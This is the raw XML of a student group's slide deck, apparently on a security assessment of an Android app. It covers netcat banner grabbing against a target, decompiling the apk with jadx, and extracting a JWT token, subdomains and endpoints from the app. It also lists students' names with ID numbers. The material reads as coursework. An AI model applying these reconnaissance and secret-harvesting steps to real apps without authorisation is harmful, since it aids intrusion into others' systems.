    <dsp:sp modelId="{F1EE9BCD-97C5-4784-8487-A01747CA2ACE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3614737" y="39687"/>
          <a:ext cx="3286125" cy="1971675"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="-2430430"/>
            <a:satOff val="-165"/>
            <a:lumOff val="39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kern="1200"/>
            <a:t>nc &lt;target-ip&gt; &lt;port&gt;</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3614737" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2BB1FDC-D044-4462-8067-995DF0E6DFED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7229475" y="39687"/>
          <a:ext cx="3286125" cy="1971675"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="-4860860"/>
            <a:satOff val="-330"/>
            <a:lumOff val="78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kern="1200" dirty="0"/>
            <a:t>The output should be :</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7229475" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0CC8BE6-4EA5-4AF3-BBC1-1B6CF34BB096}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2339975"/>
          <a:ext cx="3286125" cy="1971675"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="-7291290"/>
            <a:satOff val="-496"/>
            <a:lumOff val="117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i="0" kern="1200"/>
            <a:t>Date</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2800" b="0" i="0" kern="1200"/>
            <a:t>: The current date and time.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2339975"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{088FD0FD-CC52-435F-9C92-DC437C875497}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3614737" y="2339975"/>
          <a:ext cx="3286125" cy="1971675"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="-9721720"/>
            <a:satOff val="-661"/>
            <a:lumOff val="156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i="0" kern="1200"/>
            <a:t>Server</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2800" b="0" i="0" kern="1200"/>
            <a:t>: The server software and version</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3614737" y="2339975"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F7568511-0FBA-4AE6-87F0-2C49B8F7E410}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7229475" y="2339975"/>
          <a:ext cx="3286125" cy="1971675"/>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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" b="1" i="0" kern="1200"/>
            <a:t>Content-Type</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2800" b="0" i="0" kern="1200"/>
            <a:t>: Information about the type of content being served.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7229475"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F1A8E-7BD0-4CA9-8857-B3AC75C7707A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/24/2024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29D55-5285-4EE8-90D8-692950ECB81C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3954596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F29D55-5285-4EE8-90D8-692950ECB81C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296726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F29D55-5285-4EE8-90D8-692950ECB81C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2063073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5122-3E1E-CE0C-C0DA-A2B3E72E04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0105C-85C4-B1BC-0BDF-7CCB6C87D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8E60F-6341-E76F-0420-7D038492D20A}"/>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39FDA85A-2A4C-68E5-2A65-96A31F3A7A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7BA85-2176-F669-CFF7-68A398F6BB83}"/>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933766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1DB9A-1018-8B69-D9D6-E0FA05C92C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C97111-913C-B002-F87A-394E2692F1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91A2F4-6005-AA7F-5E3C-31F35D0B23BB}"/>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84ACD266-5F83-F5C5-9615-D475E48CE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64AE2-A6FA-5BDC-FDCA-44F22C072C31}"/>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196834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E618EE-6550-C12E-246C-E7DBAEDACE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301FA0-B229-37C9-8AD9-BE8F0F0A32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E90E90-FCD5-E463-DCEB-E59B4EEA75EC}"/>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3A4445DD-8719-733C-7FAB-AF4C4B52F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5C120-E284-F44B-A2EC-1534A8C231BA}"/>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826618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955418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964281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4038462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376387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7922899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7377267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2239142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013193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A76E-A0C7-A583-93C0-D4A127AAB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048393-FDFB-D21A-9D61-33013AFB7A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8CE54-3D1A-7AEC-0F48-064F33106148}"/>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A948A615-C3C0-4124-953D-97D67A8D4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EBBDE-68BB-CB02-83F2-2F4371278B13}"/>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34953322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1077071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161558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F9473-0184-E531-7923-68D3BF5DD4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D254CC-6973-CF25-C1AB-B6C2579D7D4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6EFC14E-F122-926F-7F1F-3E710D2B01DE}"/>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E193D6BB-F385-C8FA-74E6-1980B721DD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F5885D-F70C-5C15-3CD7-BB72F092671D}"/>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2526315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13D68-2C47-D83A-CAD3-1413865E43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A9CB4C-9EDC-0336-0D44-86588D5EA3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D96876-3E36-7508-D8C7-C0161B777B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B0A0A5-7890-A940-E345-92295B744FFE}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3542492-9D1D-5924-9DF3-9268290AD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98D662-4820-BC20-2A65-870003AAE3FC}"/>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2599313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08C7-4B3E-A134-FBB7-0EAB9B3071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C195AA-CD15-BB2F-233A-915786F35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C5767D-74A4-A9AE-8215-0D396F29E3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20FF07-674B-A928-1C3D-358842EF88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29B720-20E9-D8DD-0E26-F83D500EE7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0AAA7A-498B-3F3C-82D3-BDE425C1D134}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D837B86F-5E86-4AB1-19C2-8A2807998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D14D6C-1B32-C160-8493-F944B44D8C5E}"/>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3637872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3CFC-5FC2-A44A-2294-DA16CF50DC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5781C7-AA51-4B87-7B31-E53BD52C554A}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D4D2FF9-E0D2-92F9-6DEF-DD24439568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B6BE278-E0E8-DDD5-1CEF-023111E8685F}"/>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37717655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E88AEA2-8C35-06C3-2C64-CE920ED95C8D}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22135427-8A72-1D55-9BBF-6C9E72A345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0BAAC7-0425-A1C1-A760-B91730E099AC}"/>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2021069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D4423-1DF0-8608-B882-B06ECCC7DC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515FAF-D382-119B-9DEE-093FD8DCE5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A7C45E-36FB-6FDC-0D02-6475BFBBF7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C2BF1C-08BE-30A3-7DC8-FE3F3461ACFA}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E281CBF6-0F8D-F24D-CCA6-E95D9D42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39F0DF-030F-CFD2-0EC6-3703320CEA22}"/>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929325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4DC4C-D2BB-73C4-5866-8CE4154C78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DA547E-F198-1C6A-E911-701B601D2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04D7AE-D07D-C2EC-9F1D-AB105A2B88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67B971-9ECC-1F28-708B-34282D5E162A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E71D98A7-75BF-4146-B151-CA2CF9046127}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/24/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{353549B5-3F8F-8F7D-9E66-0B22C2BB7B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D9C33-3B75-8D3C-F735-4D92ACE65943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{10DEABAB-CBE3-4A1A-81A9-A805E0A4BAB1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="863999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6FB465-EDB6-829A-7021-5D3319C414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0107F2-4CF6-AE1B-B151-689AFD70C2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1BBDCF-1FF6-5720-7225-D8E455EB7E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1D98A7-75BF-4146-B151-CA2CF9046127}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/24/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2150E3C4-BA86-7EC0-9FCF-27D65C12C0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A754E5D-6A59-0CE7-C07D-C4DC2D3B3C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0DEABAB-CBE3-4A1A-81A9-A805E0A4BAB1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2033323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27.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90E33B-E2AF-40EE-3224-374B01702087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="994558"/>
            <a:ext cx="5678011" cy="3163224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>Group Anonymous</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{090EB24E-7018-4DFB-CBBD-CBDD2ADA699E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-55592" y="1936594"/>
            <a:ext cx="6774425" cy="4049485"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>1-Group Admin : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>Mohab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> Yaser :21028727</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>2-Mina Ghattas : 21000168</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>3-Abram Anwar : 21006656</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>4-Mohamed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>Wael :21032494</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>5-Malak Osama : 21023606</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>6-Nourhan Ayman : 21027887</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">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ack and white mask&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F98C8711-F410-07DA-63B5-B1287DCE3616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="-2" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6663241" y="1064674"/>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407308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fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20"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fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41"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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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25422-FF11-9A91-0CA1-2BE482CCC109}"/>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3600" b="1" dirty="0"/>
              <a:t>Information Gathering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" b="1"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5BED1796-4FFF-C9F5-3222-33AC0EBAD710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2660904"/>
            <a:ext cx="4818888" cy="35478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rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extracted the contents of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jadx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83420886-8EBA-BC78-ED3A-1B152901292C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5637989" y="967869"/>
            <a:ext cx="6348911" cy="4922262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27956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CA6ACF0-C25B-F30D-2FDA-C4394416D242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046746" y="586822"/>
            <a:ext cx="3560252" cy="1645920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Static Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 1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6" name="Rectangle 1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BDE4E51-C192-7B8F-B6F7-3CF75CE53DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351164" y="586822"/>
            <a:ext cx="6002636" cy="1645920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kept searching for important keys like passwords or hashes or tokens to get from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file until I got a JWT token, two subdomains and several Endpoints that we can use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer code&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4569B875-44DE-9CB9-64DA-E9A3EB01AB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2968736"/>
            <a:ext cx="11164824" cy="3014503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3007504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B8B64D1-789E-7313-20D1-5D68551FACD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783FD2-0FB7-FCE6-C539-7512C252F483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793662" y="386930"/>
            <a:ext cx="10066122" cy="1298448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Analysis of Gathered Data (Vulnerability Identification)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" dirty="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334E4D-C370-5DB5-34A4-F686C8BFA1B6}"/>
              </a:ext>
